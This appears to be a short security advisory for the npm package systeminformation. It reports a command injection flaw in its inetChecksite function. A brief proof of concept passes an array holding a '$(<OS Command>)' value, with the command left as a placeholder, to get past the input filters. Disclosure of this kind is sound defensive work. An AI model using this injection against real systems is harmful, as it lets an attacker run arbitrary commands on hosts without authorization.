systeminformation

vulnerability command injection
severity 8.8
language javascript
registry npm

Description

systeminformation is vulnerable to Command Injection vulnerability.

It is possible to send an array containing OS commands, which bypass the filters.

Proof of Concept

  1. Create a Javascript file with the content below:
const si = require('systeminformation');
const command = "$(<OS Command>)";
si.inetChecksite([command]);
  1. Edit the constant command with a desired OS command.

  2. Run it.

References